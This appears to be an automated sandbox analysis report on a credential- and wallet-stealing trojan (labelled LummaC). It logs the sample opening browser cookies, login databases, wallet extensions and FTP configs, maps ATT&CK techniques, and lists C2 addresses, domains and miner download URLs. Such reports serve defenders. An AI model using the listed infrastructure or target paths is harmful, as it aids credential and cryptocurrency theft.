                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.jsJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqliteJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeDirectory queried: C:\Users\user\Documents\CZQKSDDMWRJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeDirectory queried: C:\Users\user\Documents\CZQKSDDMWRJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeDirectory queried: C:\Users\user\Documents\KLIZUSIQENJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeDirectory queried: C:\Users\user\Documents\KLIZUSIQENJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeDirectory queried: C:\Users\user\Documents\CZQKSDDMWRJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeDirectory queried: C:\Users\user\Documents\CZQKSDDMWRJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeDirectory queried: C:\Users\user\Documents\KLIZUSIQENJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeDirectory queried: C:\Users\user\Documents\KLIZUSIQENJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeDirectory queried: C:\Users\user\Documents\CZQKSDDMWRJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeDirectory queried: C:\Users\user\Documents\CZQKSDDMWRJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeDirectory queried: C:\Users\user\Documents\TQDFJHPUIUJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeDirectory queried: C:\Users\user\Documents\TQDFJHPUIUJump to behavior
                  Source: Yara matchFile source: 00000002.00000003.1109274613.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.1081894496.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.1108659728.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.1082401555.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: setupx 1.exe1.exe PID: 6848, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: Process Memory Space: setupx 1.exe1.exe PID: 6848, type: MEMORYSTR
                  Source: Yara matchFile source: 2.2.setupx 1.exe1.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.setupx 1.exe1.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.2253160823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1082664009.0000000002D39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts141
                  Windows Management Instrumentation
                  1
                  DLL Side-Loading
                  1
                  DLL Side-Loading
                  1
                  Disable or Modify Tools
                  2
                  OS Credential Dumping
                  1
                  System Time Discovery
                  Remote Services1
                  Archive Collected Data
                  1
                  Web Service
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Command and Scripting Interpreter
                  1
                  Windows Service
                  1
                  Windows Service
                  11
                  Deobfuscate/Decode Files or Information
                  LSASS Memory11
                  File and Directory Discovery
                  Remote Desktop Protocol41
                  Data from Local System
                  13
                  Ingress Tool Transfer
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts1
                  Scheduled Task/Job
                  1
                  Scheduled Task/Job
                  211
                  Process Injection
                  4
                  Obfuscated Files or Information
                  Security Account Manager44
                  System Information Discovery
                  SMB/Windows Admin Shares1
                  Screen Capture
                  21
                  Encrypted Channel
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts1
                  PowerShell
                  Login Hook1
                  Scheduled Task/Job
                  2
                  Software Packing
                  NTDS371
                  Security Software Discovery
                  Distributed Component Object Model3
                  Clipboard Data
                  4
                  Non-Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  Timestomp
                  LSA Secrets1
                  Process Discovery
                  SSHKeylogging125
                  Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Side-Loading
                  Cached Domain Credentials261
                  Virtualization/Sandbox Evasion
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items261
                  Virtualization/Sandbox Evasion
                  DCSync1
                  Application Window Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job211
                  Process Injection
                  Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1637273 Sample: setupx 1.exe1.exe Startdate: 13/03/2025 Architecture: WINDOWS Score: 100 60 pastebin.com 2->60 62 citydisco.bet 2->62 78 Found malware configuration 2->78 80 Antivirus detection for URL or domain 2->80 82 Antivirus / Scanner detection for submitted sample 2->82 86 11 other signatures 2->86 11 setupx 1.exe1.exe 1 2->11         started        signatures3 84 Connects to a pastebin service (likely for C&C) 60->84 process4 signatures5 94 Injects a PE file into a foreign processes 11->94 14 setupx 1.exe1.exe 1 11->14         started        19 WerFault.exe 19 16 11->19         started        21 conhost.exe 11->21         started        process6 dnsIp7 66 185.215.113.51, 49695, 49701, 49702 WHOLESALECONNECTIONSNL Portugal 14->66 68 citydisco.bet 188.114.97.3, 443, 49682, 49684 CLOUDFLARENETUS European Union 14->68 58 C:\Users\user\...\ZHKYZWVTC38PGAWGZF49K.exe, PE32 14->58 dropped 70 Query firmware table information (likely to detect VMs) 14->70 72 Found many strings related to Crypto-Wallets (likely being stolen) 14->72 74 Tries to harvest and steal ftp login credentials 14->74 76 2 other signatures 14->76 23 ZHKYZWVTC38PGAWGZF49K.exe 15 31 14->23         started        file8 signatures9 process10 dnsIp11 64 pastebin.com 172.67.19.24, 443, 49699 CLOUDFLARENETUS United States 23->64 54 C:\ProgramData\Dllhost\WinRing0x64.sys, PE32+ 23->54 dropped 56 C:\ProgramData\Dllhost\winlogson.exe, PE32+ 23->56 dropped 90 Multi AV Scanner detection for dropped file 23->90 92 Sample is not signed and drops a device driver 23->92 28 cmd.exe 1 23->28         started        31 cmd.exe 23->31         started        33 cmd.exe 23->33         started        file12 signatures13 process14 signatures15 96 Encrypted powershell cmdline option found 28->96 98 Uses schtasks.exe or at.exe to add and modify task schedules 28->98 100 Uses powercfg.exe to modify the power settings 28->100 102 Modifies power options to not sleep / hibernate 28->102 35 powershell.exe 23 28->35         started        38 conhost.exe 28->38         started        40 powercfg.exe 1 28->40         started        50 4 other processes 28->50 42 conhost.exe 31->42         started        44 schtasks.exe 31->44         started        46 conhost.exe 33->46         started        48 schtasks.exe 33->48         started        process16 signatures17 88 Loading BitLocker PowerShell Module 35->88 52 WmiPrvSE.exe 35->52         started        process18

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  setupx 1.exe1.exe66%VirustotalBrowse
                  setupx 1.exe1.exe66%ReversingLabsWin32.Trojan.LummaC
                  setupx 1.exe1.exe100%AviraTR/Crypt.Agent.ivuts
                  SourceDetectionScannerLabelLink
                  C:\ProgramData\Dllhost\WinRing0x64.sys5%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe82%ReversingLabsByteCode-MSIL.Trojan.Jalapeno
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  http://185.215.113.51/conhost.exe:0%Avira URL Cloudsafe
                  https://citydisco.bet/gdJISre0%Avira URL Cloudsafe
                  http://185.215.113.51/WatchDogee0%Avira URL Cloudsafe
                  http://185.215.113.51/D0%Avira URL Cloudsafe
                  https://citydisco.bet/D0%Avira URL Cloudsafe
                  https://citydisco.bet/gdJISAAIA0%Avira URL Cloudsafe
                  http://185.215.113.51/J0%Avira URL Cloudsafe
                  http://185.215.113.51/C0%Avira URL Cloudsafe
                  https://citydisco.bet:443/gdJIS71025-5-0%Avira URL Cloudsafe
                  https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.0%Avira URL Cloudsafe
                  https://citydisco.bet/Vs16c0%Avira URL Cloudsafe
                  http://crl.mi0%Avira URL Cloudsafe
                  http://185.215.113.51/lolMiner.exe?http://185.215.113.51/xmrig.exe100%Avira URL Cloudmalware
                  https://citydisco.bet/gdJIS60%Avira URL Cloudsafe
                  https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg0%Avira URL Cloudsafe
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  citydisco.bet
                  188.114.97.3
                  truefalse
                    high
                    pastebin.com
                    172.67.19.24
                    truefalse
                      high
                      NameMaliciousAntivirus DetectionReputation
                      bugildbett.top/bAuzfalse
                        high
                        citydisco.bet/gdJISfalse
                          high
                          http://185.215.113.51/WinRing0x64.sysfalse
                            high
                            https://pastebin.com/raw/YpJeSRBCfalse
                              high
                              cjlaspcorne.icu/DbIpsfalse
                                high
                                mrodularmall.top/aNzSfalse
                                  high
                                  jowinjoinery.icu/bdWUafalse
                                    high
                                    legenassedk.top/bdpWOfalse
                                      high
                                      http://185.215.113.51/xmrig.exefalse
                                        high
                                        featureccus.shop/bdMAnfalse
                                          high
                                          htardwarehu.icu/Sbdsafalse
                                            high
                                            https://citydisco.bet/gdJISfalse
                                              high
                                              NameSourceMaliciousAntivirus DetectionReputation
                                              http://185.215.113.51/WatchDog.exeZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.0000000002F91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
